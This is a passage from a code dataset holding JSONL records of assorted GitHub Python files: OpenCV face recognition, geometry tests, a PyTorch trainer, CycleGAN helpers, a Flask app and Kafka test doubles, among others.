async_session_factory(bind=async_engine, autocommit=True, autoflush=True) as session:\n# yield session\n","repo_name":"ruslands/auth-service","sub_path":"core/database/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"27053385941","text":"import numpy as np \nimport cv2 as cv\n\npeople = ['Ben Afflek','Elton John','Jerry Seinfield','Madonna','Mindy Kaling']\nhaar_cascade = cv.CascadeClassifier('face_detection/haarcascade_frontalface_default.xml')\n\n# features = np.load('features.npy')\n# labels = np.load('labels.npy')\n\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\nface_recognizer.read('face_trained.yml')\n\nimg = cv.imread(r'C:\\Users\\omkar\\Desktop\\opencv\\Resources\\Faces\\val\\mindy_kaling\\2.jpg')\ndef test_on(img):\n gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n\n #Detect:\n faces_rect = haar_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=4)\n for (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h,x:x+w] # REGION OF INTEREST\n #Prediction:\n label,confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {label} with a confidence of {confidence}')\n\n cv.putText(img, str(people[label]),(20,20),cv.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\n\n cv.imshow('Detected Face',img)\n\ntest_on(img)\ncv.waitKey(0)\n\n\n#NOT THAT GOOD A FACE RECOGNITION :(","repo_name":"OmkarGhadge/FaceRecognition","sub_path":"face_recognition/face_rec.py","file_name":"face_rec.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71292850839","text":"import itertools\nimport math\n\nimport pytest\n\nimport codecad\nimport codecad.subdivision\n\n\ndef set_has_approx_item(s1, i2, *args, **kwargs):\n for i1 in s1:\n if i1 == pytest.approx(i2, *args, **kwargs):\n return True\n\n return False\n\n\nclass SetApproxEquals:\n def __init__(self, s1, s2, *args, **kwargs):\n self.s1_extra = set()\n for item1 in s1:\n if not set_has_approx_item(s2, item1, *args, **kwargs):\n self.s1_extra.add(item1)\n\n self.s2_extra = set()\n for item2 in s2:\n if not set_has_approx_item(s1, item2, *args, **kwargs):\n self.s2_extra.add(item2)\n\n def __bool__(self):\n return len(self.s1_extra) == len(self.s2_extra) == 0\n\n def __str__(self):\n return \" \".join(\n [\n \"Extra values in s1:\",\n str(self.s1_extra),\n \"Extra values in s2:\",\n str(self.s2_extra),\n ]\n )\n\n\n@pytest.mark.parametrize(\n \"box_size\", [codecad.util.Vector(10, 20, 30), codecad.util.Vector(16, 16, 16)]\n)\n@pytest.mark.parametrize(\"dimension\", [2, 3])\n@pytest.mark.parametrize(\"resolution\", [1, 0.1])\n@pytest.mark.parametrize(\n \"grid_size, multiplier\", [(2, 1), (2, 2), (21, 1), (256, 1), (256, 256)]\n)\n@pytest.mark.parametrize(\"overlap\", [True, False])\ndef test_block_sizes(box_size, dimension, resolution, grid_size, overlap, multiplier):\n box = codecad.util.BoundingBox(-box_size / 2, box_size / 2)\n bs = codecad.subdivision.calculate_block_sizes(\n box, dimension, resolution, grid_size, overlap, multiplier\n )\n\n assert bs[-1][0] == 1, \"Final block size must have block size 1\"\n for i, (level_resolution, level_size) in enumerate(bs):\n if i > 0:\n for j in range(dimension):\n assert (\n level_size[j] == grid_size\n ), \"Non-top level blocks must have the preset grid resolution\"\n if dimension == 2:\n assert level_size[2] == 1, \"2D blocks must have just a single layer in Z\"\n assert (\n level_size[0] > 1 or level_size[1] > 1 or level_size[2] > 1\n ), \"All levels must have more than one sub-blocks\"\n\n for j in range(dimension):\n assert (\n level_size[j] % multiplier == 0\n ), \"All level sizes must be divisible by muliplier\"\n\n real_block_size = bs[0][0] * resolution\n if overlap and len(bs) == 1:\n for i in range(dimension):\n assert (\n bs[0][1][i] >= box_size[i] / real_block_size + 1\n ), \"Top level block must cover the whole box (overlap)\"\n assert multiplier > 1 or box_size[i] / real_block_size + 1 > (\n bs[0][1][i] - 1\n ), \"Top level block must not be too large (overlap)\"\n else:\n for i in range(dimension):\n assert bs[0][1][i] >= box_size[i] / (\n bs[0][0] * resolution\n ), \"Top level block must cover the whole box\"\n assert multiplier > 1 or box_size[i] / real_block_size > (\n bs[0][1][i] - 1\n ), \"Top level block must not be too large\"\n\n for (\n level_number,\n ((level_resolution, level_size), (prev_level_resolution, prev_level_size)),\n ) in enumerate(zip(bs[:-1], bs[1:])):\n for i in range(dimension):\n if overlap and level_number == len(bs) - 2:\n assert level_resolution == prev_level_resolution * (\n prev_level_size[i] - 1\n ), \"Each level must exactly cover the next one (overlap)\"\n else:\n assert (\n level_resolution == prev_level_resolution * prev_level_size[i]\n ), \"Each level must exactly cover the next one\"\n\n\ndef test_block_corners_cube():\n _, _, blocks = codecad.subdivision.subdivision(\n codecad.shapes.box(10), 1, grid_size=4, overlap_edge_samples=True\n )\n\n assert blocks[0][2] == 1\n assert blocks[0][4] == 1\n\n corners = {block[1] for block in blocks}\n expected = {\n codecad.util.Vector(*coords)\n for coords in itertools.product([-5.5, -2.5, 0.5, 3.5], repeat=3)\n } - {\n codecad.util.Vector(*coords)\n for coords in itertools.product([-2.5, 0.5], repeat=3)\n }\n\n assert corners == expected\n\n\ndef test_block_corners_circle():\n resolution = 0.1 # Size of single cell\n grid_size = 8\n step = resolution * (grid_size - 1) # Size of the inner block\n diameter = grid_size * step - resolution\n radius = diameter / 2\n threshold = math.sqrt(2) * step / 2\n\n _, _, blocks = codecad.subdivision.subdivision(\n codecad.shapes.circle(diameter),\n resolution,\n grid_size=grid_size,\n overlap_edge_samples=True,\n )\n\n assert blocks[0][2] == resolution\n assert blocks[0][4] == 1\n\n r = []\n for i in range(grid_size):\n r.append(-radius - 0.5 * resolution + i * step)\n\n corners = {block[1] for block in blocks}\n\n expected = set()\n for coords in itertools.product(r, repeat=2):\n corner = codecad.util.Vector(*coords)\n center = corner + codecad.util.Vector(step / 2, step / 2, 0)\n if radius - threshold < abs(center) < radius + threshold:\n expected.add(corner)\n\n assert SetApproxEquals(corners, expected)\n","repo_name":"bluecube/codecad","sub_path":"tests/test_subdivision.py","file_name":"test_subdivision.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"29747768120","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import Compose\n\nfrom model.AudioTransformer import AudioTransformer\nfrom model.UnlabeledDataset import UnlabeledDataset\nfrom model.UnsupervisedTrainer import UnsupervisedTrainer\nfrom runners.shared import setup_args\nfrom transforms.Flattener import Flattener, UndoFlattener\nfrom transforms.PatchMasker import PatchMasker\nfrom transforms.Sequencer import Sequencer, UndoSequencer\n\n\ndef train_model():\n args = setup_args().parse_args()\n dataset = UnlabeledDataset(\n csv_file=args.csv_file,\n root_dir=args.data_folder,\n extension=args.extension\n )\n data_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True)\n\n flattener_memory = []\n transform = Compose([\n PatchMasker(\n patch_width=args.patch_width,\n patch_height=args.patch_height,\n probability=args.patch_probability\n ),\n Flattener(memory=flattener_memory),\n Sequencer(sequence_length=args.sequence_length),\n ])\n\n undo_transform = Compose([\n UndoSequencer(),\n UndoFlattener(memory=flattener_memory, original_shape=(args.input_height, args.input_width))\n ])\n\n model = AudioTransformer(\n input_width=args.input_width,\n input_height=args.input_height,\n hidden_size=args.hidden_size,\n num_layers=args.num_layers,\n num_heads=args.num_heads,\n pre_transforms=transform,\n post_transforms=undo_transform,\n kernel_size=args.kernel_size,\n stride=args.stride,\n dropout_rate=args.dropout_rate\n )\n\n # optimizer = torch.optim.AdamW(params=model.parameters(), lr=hp.learning_rate)\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.learning_rate)\n loss_fn = torch.nn.MSELoss()\n scheduler = torch.optim.lr_scheduler.StepLR(\n optimizer=optimizer,\n step_size=args.scheduler_step_size,\n gamma=args.scheduler_gamma)\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(device)\n trainer = UnsupervisedTrainer(model=model, optimizer=optimizer, loss_fn=loss_fn, scheduler=scheduler, device=device)\n\n trainer.train(\n data_loader=data_loader,\n epochs=args.epochs,\n save_interval=args.save_interval\n )\n\n\nif __name__ == '__main__':\n train_model()\n","repo_name":"calin2110/Recommendor","sub_path":"recommendor/runners/TransformerTrainer.py","file_name":"TransformerTrainer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13572835781","text":"import os\nimport unittest\n\n# from flake8.engine import get_style_guide\n# flake8.api.legacy.get_style_guide(**kwargs)\n# http://flake8.pycqa.org/en/latest/user/python-api.html\n\n# import flake8.api.legacy\n# def get_style_guide(*args, **kwargs):\n# return flake8.api.legacy.get_style_guide(*args, **kwargs)\n\nfrom flake8.api import legacy as flake8\n\n# disbale the flake8 logger:\n# http://flake8.pycqa.org/en/latest/user/python-api.html\nfrom logging import getLogger\n\ngetLogger('flake8').propagate = False\n\nstyle_guide = flake8.get_style_guide(\n ignore=(\n # 'E129', # visually indented line with same indent (in gui.py)\n 'E501', # line too long\n # 'E126', # continuation line over-indented for hanging indent\n # 'E128', # continuation line under-indented for visual indent\n # 'E221', # multiple spaces before operator\n # 'E222', # multiple spaces after operator\n # 'E722', # do not use bare except\n # 'F403', # 'import *' used; unable to detect undefined names\n # 'F405', # ... may be undefined, or defined from star imports: ...\n ),\n report=None,\n exclude=[]\n)\n\n\ndef base_directory():\n current = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(current, '..')\n\n\nclass Flake8Test(unittest.TestCase):\n\n def test_flake8(self):\n report = style_guide.check_files([\n base_directory()\n ])\n\n self.assertEqual(report.get_statistics('E'), [], 'Flake8 reports errors')\n","repo_name":"Blokkendoos/AACircuit","sub_path":"tests/test_flake.py","file_name":"test_flake.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"85"} +{"seq_id":"11594523602","text":"from math import log2\nfrom collections import Counter\n\nclass MetaInstruction:\n def __init__(self, source, target):\n self.source = source\n self.target = target\n\n\nclass MoveMetaIntstruction(MetaInstruction):\n def __init__(self, source, target, scale, shift, neg=False):\n super().__init__(source, target)\n self.scale = scale\n self.shift = shift\n self.neg = neg\n\n def length(self):\n return abs(self.scale) + abs(self.shift[0]) + abs(self.shift[1]) + self.neg\n\n def cost(self):\n return self.length()\n\n def __str__(self):\n dirs = []\n if self.shift[0] < 0:\n dirs.append(('\\u2192', abs(self.shift[0]))) # right\n if self.shift[0] > 0:\n dirs.append(('\\u2190', abs(self.shift[0]))) # left\n if self.shift[1] < 0:\n dirs.append(('\\u2191', abs(self.shift[1]))) # up\n if self.shift[1] > 0:\n dirs.append(('\\u2193', abs(self.shift[1]))) # down\n if self.scale > 0:\n dirs.append(('+', abs(self.scale)))\n if self.scale < 0:\n dirs.append(('-', abs(self.scale)))\n\n s = ('m [%d]->[%d] || ' % (self.source, self.target)) + ' '.join(['%s (%d)' % (s, a) for s, a in dirs])\n if self.neg:\n s = s + ' ¬'\n return s\n\n def __repr__(self):\n return self.__str__()\n\n\nclass AddMetaInstruction(MetaInstruction):\n def __init__(self, source1, source2, s1neg, s2neg, target):\n super().__init__(source1, target)\n self.source2 = source2\n self.s1neg = s1neg\n self.s2neg = s2neg\n\n def cost(self):\n return 1\n\n def __str__(self):\n if self.s1neg:\n a, b, op = self.source2, self.source, '-'\n elif self.s2neg:\n a, b, op = self.source, self.source2, '-'\n else:\n a, b, op = self.source, self.source2, '+'\n\n return '+ [%d]%s[%d]->[%d]' % (a, op, b, self.target)\n\n def __repr__(self):\n return self.__str__()\n\n\ndef get_shift(pair):\n \"\"\"Return the distance from goal 1 to goal 2, -1 if the goals are not similar\"\"\"\n down, up = pair\n ratio = len(down)/len(up)\n scale = int(log2(ratio))\n # identify the distinct values\n down, up = Counter([a.val() for a in down]), Counter([a.val() for a in up])\n\n if len(up) != len(down):\n raise ValueError('[Error] Invalid pair. No shift possible: ' + str(pair))\n\n lower_pivot = next(iter(down.keys()))\n lower_pivot_count = down[lower_pivot]\n lower_pivot_x, lower_pivot_y, lower_pivot_neg = lower_pivot\n for (upper_pivot_x, upper_pivot_y, upper_pivot_neg), upper_pivot_count in up.items():\n if upper_pivot_count * ratio != lower_pivot_count:\n continue\n distance_x, distance_y, distance_neg = \\\n upper_pivot_x-lower_pivot_x, upper_pivot_y-lower_pivot_y, upper_pivot_neg != lower_pivot_neg\n # For the distance of the selected pivots, we must find a mapping for all remaining atoms\n # if not, the pivot selection was wrong and we select another pivot (break)\n for lower_x, lower_y, lower_neg in down.keys():\n if (lower_x+distance_x, lower_y+distance_y, lower_neg != distance_neg) not in up.keys():\n break\n else:\n return scale, (distance_x, distance_y), distance_neg\n raise ValueError('[Error] Invalid pair. No shift possible: ' + str(pair))\n\n\ndef find_goal_in_reg(reg_state, needle_goal):\n for reg, goal in reg_state.items():\n if goal == needle_goal:\n return reg\n return -1\n\n\ndef generate_meta_program(plan):\n meta_program = []\n\n prev_reg_state = {\n 0: plan[0].pair[0] # assign initial state\n }\n\n next_reg = 1\n\n for step in plan:\n\n trivial = set()\n new_reg_state = {}\n\n non_trivial_goals = []\n # consider all trivial goals\n for i, goal in enumerate(step.goals):\n # if the goal is a goal we had before, just leave it in same register, nothing else to be done\n prev_reg = find_goal_in_reg(prev_reg_state, goal)\n if prev_reg >= 0:\n new_reg_state[prev_reg] = goal\n trivial.add(prev_reg)\n else:\n non_trivial_goals.append(goal)\n if len(non_trivial_goals) == 0:\n continue\n if len(non_trivial_goals) > 2:\n print('[ERROR] Wrong number of non-trivial goals per step')\n return\n\n # analyze non trivial goals\n # A non trivial goal is either:\n # - sum of two previous goals plus a shift of a previous goal\n # - sum of one previous goals plus a shift of a previous goal\n # - shift of a previous goal.\n # - sum of two previous goals\n # There can be only one non-trivial goal with a shift, and only one without shift\n # We have to perform the non-trivial goal without shift first\n\n shift_gen_set = step.pair[1]\n shift_source = find_goal_in_reg(prev_reg_state, step.pair[0])\n if shift_source == -1:\n print('[ERROR] Could not construct new register state from previous register state. (No shift gen)')\n\n\n goal_props = []\n for goal in non_trivial_goals:\n # grab all the previous goals that are subsets of this goal (max. 2)\n subset_sources = set()\n shift_portion = goal\n for reg, prev_goal in prev_reg_state.items():\n if prev_goal.issubset(goal):\n subset_sources.add(reg)\n shift_portion = shift_portion.difference(prev_goal)\n if shift_portion and shift_portion != shift_gen_set and shift_portion | step.pair[0] != shift_gen_set:\n print('[ERROR] Could not construct new register state from previous state (shift gen do not match)')\n goal_props.append((False if not shift_portion else True, subset_sources, goal))\n\n # separate the shift goal from the non-shift goal\n goal_props.sort(key=lambda x: x[0])\n\n # if we have a non-shift non-trivial goal, apply that first\n if len(goal_props) > 1: # we have both, non shift and shift\n _, non_shift_subset_sources, goal = goal_props[0]\n s1, s2 = tuple(non_shift_subset_sources)\n # find a target\n t = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(s1, s2, False, False, t))\n new_reg_state[t] = goal\n\n # the second part is now the shift non-trivial goal\n _, shift_subset_sources, shift_goal = goal_props[-1]\n scale, shift, polarity = get_shift(step.pair)\n # if we have a zero distance shift, we have to remove the shift source from the subset sources, as this\n # is no longer a subset source, but results from the scaling (move)\n if not polarity and shift[0] == 0 and shift[1] == 0 and shift_source in shift_subset_sources:\n shift_subset_sources.remove(shift_source)\n\n # if we have two subset sources, it uses less registers to add them together first. Otherwise, do shift first\n if len(shift_subset_sources) < 2 or shift_subset_sources.issubset(trivial):\n target = next_reg\n next_reg += 1\n # if we do not do any adds later on, we have to do a potential inversion in the move step\n meta_program.append(MoveMetaIntstruction(shift_source, target, scale, shift, (len(shift_subset_sources) == 0) and polarity))\n prev_polarity = polarity\n\n for subset_source in shift_subset_sources:\n prev_target = target\n target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(subset_source, prev_target, False, prev_polarity, target))\n prev_polarity = False\n\n else:\n s1, s2 = tuple(shift_subset_sources)\n sub_target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(s1, s2, False, False, sub_target))\n shift_target = next_reg\n next_reg += 1\n meta_program.append(MoveMetaIntstruction(shift_source, shift_target, scale, shift))\n target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(sub_target, shift_target, False, polarity, target))\n\n new_reg_state[target] = shift_goal\n prev_reg_state = new_reg_state\n\n return meta_program","repo_name":"ThomasDebrunner/auto_code_cpa","sub_path":"scamp_filter/MetaProgrammer.py","file_name":"MetaProgrammer.py","file_ext":"py","file_size_in_byte":8460,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"33469046777","text":"# import data loading libraries\nimport os\nimport pdb\nimport pickle\nimport argparse\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# import torch\nimport torch\n\n# numpy & scipy imports\nimport numpy as np\nimport imageio\nimport matplotlib.pyplot as plt \nimport cv2 \n\ndef checkpoint(checkpoint_dir, epoch, G_XtoY, G_YtoX, Dp_X, Dp_Y, Dg_X, Dg_Y, best=False):\n \"\"\"Saves the parameters of both generators G_YtoX, G_XtoY and discriminators D_X, D_Y.\"\"\"\n if best == True:\n checkpoint_dir = os.path.join(checkpoint_dir, 'best')\n else:\n checkpoint_dir = os.path.join(checkpoint_dir, str(epoch).zfill(6))\n\n # make directory if it does not exist\n if not os.path.exists(checkpoint_dir):\n os.system('mkdir -p '+checkpoint_dir)\n\n # build up the file paths\n G_XtoY_path = os.path.join(checkpoint_dir, 'G_XtoY.pkl')\n G_YtoX_path = os.path.join(checkpoint_dir, 'G_YtoX.pkl')\n Dp_X_path = os.path.join(checkpoint_dir, 'Dp_X.pkl')\n Dp_Y_path = os.path.join(checkpoint_dir, 'Dp_Y.pkl')\n Dg_X_path = os.path.join(checkpoint_dir, 'Dg_X.pkl')\n Dg_Y_path = os.path.join(checkpoint_dir, 'Dg_Y.pkl')\n\n # save weights to file\n torch.save(G_XtoY.state_dict(), G_XtoY_path)\n torch.save(G_YtoX.state_dict(), G_YtoX_path)\n torch.save(Dp_X.state_dict(), Dp_X_path)\n torch.save(Dp_Y.state_dict(), Dp_Y_path)\n torch.save(Dg_X.state_dict(), Dg_X_path)\n torch.save(Dg_Y.state_dict(), Dg_Y_path)\n\ndef to_data(x):\n \"\"\"Converts variable to numpy.\"\"\"\n if torch.cuda.is_available():\n x = x.cpu()\n x = x.data.numpy()\n x = ((x + 0.5)*255.0).astype(np.uint8)\n return x\n\ndef save_samples(samples_dir, epoch, fixed_Y, fixed_X, G_YtoX, G_XtoY, batch_size=16):\n \"\"\"Saves samples from both generators X->Y and Y->X.\"\"\"\n if not os.path.exists(samples_dir):\n os.system('mkdir -p '+samples_dir)\n # move input data to correct device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # X->Y->Reconstructed X\n fake_Y = G_XtoY(fixed_X.to(device))\n recon_Y_X = G_YtoX(fake_Y.to(device))\n\n # Y->X->Reconstructed Y\n fake_X = G_YtoX(fixed_Y.to(device))\n recon_X_Y = G_XtoY(fake_X.to(device))\n \n # get data in numpy format\n X, fake_Y, recon_Y_X = to_data(fixed_X), to_data(fake_Y), to_data(recon_Y_X)\n Y, fake_X, recon_X_Y = to_data(fixed_Y), to_data(fake_X), to_data(recon_X_Y)\n\n # matplotlib plot\n n_rows = min(4, batch_size)\n # plt.figure(figsize=(20,16))\n plt.figure(figsize=(16,8))\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n\n for i in range(min(n_rows, batch_size)):\n plt.subplot(n_rows*2,1,i*2+1)\n plt.title('Original Image X | Translated Image | Reconstructed Image', fontsize=16, fontweight=\"bold\")\n img_concat = cv2.hconcat([np.transpose(X[i,:,:,:], (1, 2, 0)), \n np.transpose(fake_Y[i,:,:,:], (1, 2, 0)), \n np.transpose(recon_Y_X[i,:,:,:], (1, 2, 0))])\n plt.imshow(img_concat)\n\n plt.subplot(n_rows*2,1,i*2+2)\n plt.title('Original Image Y | Translated Image | Reconstructed Image', fontsize=16, fontweight=\"bold\")\n img_concat = cv2.hconcat([np.transpose(Y[i,:,:,:], (1, 2, 0)), \n np.transpose(fake_X[i,:,:,:], (1, 2, 0)), \n np.transpose(recon_X_Y[i,:,:,:], (1, 2, 0))])\n plt.imshow(img_concat)\n\n # save the sampled results to file\n path = os.path.join(samples_dir, 'sample-{:06d}.png'.format(epoch))\n plt.savefig(path)\n plt.close()","repo_name":"towardsautonomy/CycleGAN_improved","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"85"} +{"seq_id":"6833950002","text":"from flask import Flask, render_template, request\nimport random\nimport statistics\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/rank', methods=['POST'])\ndef rank():\n \n #get scores of ppl in class\n num_people = int(request.form['number_people'])\n score = int(request.form['score'])\n #arrange scores in list in descending order\n random.seed(1)\n score_list = random.sample(range(1, 100), num_people)\n score_list.sort(reverse=True)\n #score and placing\n if score in score_list:\n rank = score_list.index(score) + 1\n result = f'The placing of your score within your class is #{rank}'\n else:\n result = 'You are not in this class '\n\n #calculator of stats\n mean_score = int(statistics.mean(score_list))\n median_score = int(statistics.median(score_list))\n mode_score = int(statistics.mode(score_list))\n stdev_score = int(statistics.stdev(score_list))\n \n return render_template('result.html', result=result, score_list=score_list, mean_score=mean_score, median_score=median_score, mode_score=mode_score, stdev_score=stdev_score)\n\napp.run(host='0.0.0.0', port=81)\n","repo_name":"Ruxi00/savetheworld1__","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33091273857","text":"from django.conf.urls import patterns, include, url\nimport dream\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'sharetools.views.home', name='home'),\n # url(r'^sharetools/', include('sharetools.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n\n url(r'^[/]?$',dream.Index,name='dream.index'),\n url(r'^detail/(?P.+?)/$',dream.Detail,name='dream.detail'),\n url(r'^search/$',dream.Search,name='dream.search'),\n url(r'^cat/(?P.+?)/$',dream.Cat,name='dream.cat'),\n\n)\n","repo_name":"iazxq/sharetools","sub_path":"app/views/jiemeng/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26560879225","text":"from pyfancy import pyfancy\nimport recommender as recom\n\ndef getAllocations(client_portfolio, allSecurities, text = True):\n \n stocks_alloc, bonds_alloc = client_portfolio.current_asset_allocation(allSecurities)\n recommended_stock_alloc, recommended_bonds_alloc = client_portfolio.recommended_asset_allocation(client_portfolio.client['Risk_profile'])\n \n if text:\n pyfancy.pyfancy().cyan(\"Current allocation: {} stocks and {} bonds \\n\".format(stocks_alloc, bonds_alloc)).output()\n pyfancy.pyfancy().cyan(\"Recommended allocation: {} stocks and {} bonds \\n\".format(recommended_stock_alloc, recommended_bonds_alloc)).output()\n \n return stocks_alloc, bonds_alloc, recommended_stock_alloc, recommended_bonds_alloc\n \n \ndef refine_exposure_to_5 (client_portfolio, allSecurities, preferences):\n stocks_alloc, bonds_alloc, recommended_stock_alloc, recommended_bonds_alloc = getAllocations(client_portfolio, allSecurities, False)\n pyfancy.pyfancy().cyan(\"Started exposure refining... \\n\").output()\n for key, exposure in client_portfolio.portfolio.items():\n if (key != 'nan'):\n if exposure > 5:\n client_portfolio.setExposure(key, 5)\n elif (key == 'nan'):\n break\n return client_portfolio.portfolio","repo_name":"rucsa/thesis_benchmark_advisor","sub_path":"advisor7/refine_exposure_to_5.py","file_name":"refine_exposure_to_5.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24487863170","text":"import pycuda.driver as cuda\nimport pycuda.autoinit\nfrom pycuda.compiler import SourceModule\n\nimport numpy as np\n\nmod = SourceModule(\"\"\"\n__global__ void sum2arrays(float *a, float *b, float *c,int N)\n{\n int idx = blockIdx.x * blockDim.x + threadIdx.x;\n if (idx Coroutine:\n topic, _ = TopicManager.get_or_create(topic_name)\n timestamp_ms = timestamp_ms or datetime.now().timestamp()\n total_partition_events = topic.offset(partition=partition)\n partition = partition or 0\n\n consumer_record = ConsumerRecord(\n topic=topic_name,\n value=value,\n key=key,\n headers=headers,\n partition=partition,\n timestamp=timestamp_ms,\n offset=total_partition_events + 1,\n timestamp_type=None,\n checksum=None,\n serialized_key_size=None,\n serialized_value_size=None,\n )\n\n await topic.put(consumer_record)\n\n async def fut():\n return RecordMetadata(\n topic=topic_name,\n partition=partition,\n timestamp=timestamp_ms,\n offset=total_partition_events + 1,\n )\n\n return fut()\n\n\nclass TestConsumer(Base, Consumer):\n __test__ = False\n\n def __init__(self, group_id: Optional[str] = None, **kwargs) -> None:\n # copy the aiokafka behavior\n self.topics: Optional[Tuple[str]] = None\n self._group_id: Optional[str] = group_id\n self._assignment: List[TopicPartition] = []\n self._previous_topic: Optional[Topic] = None\n self.partitions_committed: Dict[TopicPartition, int] = {}\n\n # Called to make sure that has all the kafka attributes like _coordinator\n # so it will behave like an real Kafka Consumer\n super().__init__()\n\n def subscribe(\n self,\n *,\n topics: Tuple[str],\n listener: RebalanceListener,\n **kwargs,\n ) -> None:\n self.topics = topics\n\n for topic_name in topics:\n topic, created = TopicManager.get_or_create(topic_name, consumer=self)\n\n if not created:\n # It means that the topic already exist, so we are in\n # the situation where the topic hs events and the Stream\n # was added on runtime\n topic.consumer = self\n\n for partition_number in range(0, 3):\n self._assignment.append(\n TopicPartition(topic=topic_name, partition=partition_number)\n )\n\n if listener.stream is not None:\n listener.stream.seek_to_initial_offsets()\n\n def assignment(self) -> List[TopicPartition]:\n return self._assignment\n\n def _check_partition_assignments(self, consumer_record: ConsumerRecord) -> None:\n \"\"\"\n When an event is consumed the partition can be any positive int number\n because there is not limit in the producer side (only during testing of course).\n In case that the partition is not in the `_assignment` we need to register it.\n\n This is only during testing as in real use cases the assignments happens\n at the moment of kafka bootstrapping\n \"\"\"\n topic_partition = TopicPartition(\n topic=consumer_record.topic,\n partition=consumer_record.partition,\n )\n\n if topic_partition not in self._assignment:\n self._assignment.append(topic_partition)\n\n def last_stable_offset(self, topic_partition: TopicPartition) -> int:\n topic = TopicManager.get(topic_partition.topic)\n\n if topic is not None:\n return topic.offset(partition=topic_partition.partition)\n return -1\n\n async def position(self, topic_partition: TopicPartition) -> int:\n \"\"\"\n Get the offset of the *next record* that will be fetched,\n so it returns offset(topic_partition) + 1\n \"\"\"\n return self.last_stable_offset(topic_partition) + 1\n\n def highwater(self, topic_partition: TopicPartition) -> int:\n \"\"\"\n A highwater offset is the offset that will be assigned to\n the *next message* that is produced, so it returns\n offset(topic_partition) + 1\n \"\"\"\n return self.last_stable_offset(topic_partition) + 1\n\n async def commit(self, offsets: Optional[Dict[TopicPartition, int]] = None) -> None:\n if offsets is not None:\n for topic_partition, offset in offsets.items():\n self.partitions_committed[topic_partition] = offset\n return None\n\n async def committed(self, topic_partition: TopicPartition) -> Optional[int]:\n return self.partitions_committed.get(topic_partition, 0)\n\n async def end_offsets(\n self, partitions: List[TopicPartition]\n ) -> Dict[TopicPartition, int]:\n topic = TopicManager.get(partitions[0].topic)\n end_offsets = {\n topic_partition: topic.offset(partition=topic_partition.partition) + 1\n for topic_partition in partitions\n }\n return end_offsets\n\n def partitions_for_topic(self, topic: str) -> Set:\n \"\"\"\n Return the partitions of all assigned topics. The `topic` argument is not used\n because in a testing enviroment the only topics are the ones declared by the end\n user.\n\n The AIOKafkaConsumer returns a Set, so we do the same.\n \"\"\"\n partitions = [topic_partition.partition for topic_partition in self._assignment]\n return set(partitions)\n\n async def getone(\n self,\n ) -> Optional[ConsumerRecord]: # The return type must be fixed later on\n if self._previous_topic:\n # Assumes previous record retrieved through getone was completed\n self._previous_topic.task_done()\n self._previous_topic = None\n\n topic = None\n for topic_partition in self._assignment:\n topic = TopicManager.get(topic_partition.topic)\n\n if not topic.consumed:\n break\n\n if topic is not None:\n consumer_record = await topic.get()\n self._check_partition_assignments(consumer_record)\n self._previous_topic = topic\n return consumer_record\n\n return None\n\n def seek(self, *, partition: TopicPartition, offset: int) -> None:\n # This method intends to have the same signature as aiokafka but with kwargs\n # rather than positional arguments\n topics = self.topics or ()\n\n if partition.topic in topics:\n topic = TopicManager.get(name=partition.topic)\n partition_offset = topic.offset(partition=partition.partition)\n\n # only consume if the offset to seek if <= the parition total events\n if offset <= partition_offset:\n consumed_events = 0\n\n # keep consuming if the events to consume <= offset to seek\n while consumed_events < offset:\n event = topic.get_nowait()\n topic.task_done()\n\n if event.partition == partition.partition:\n # only decrease if the event.partition matches\n # the partition that the user wants to seek\n consumed_events += 1\n else:\n # ideally each partition should be a Queue\n # for now just add the same event to the queue\n topic.put_nowait(event=event)\n\n # it means that this consumer can consume\n # from the TopicPartition so we can add it\n 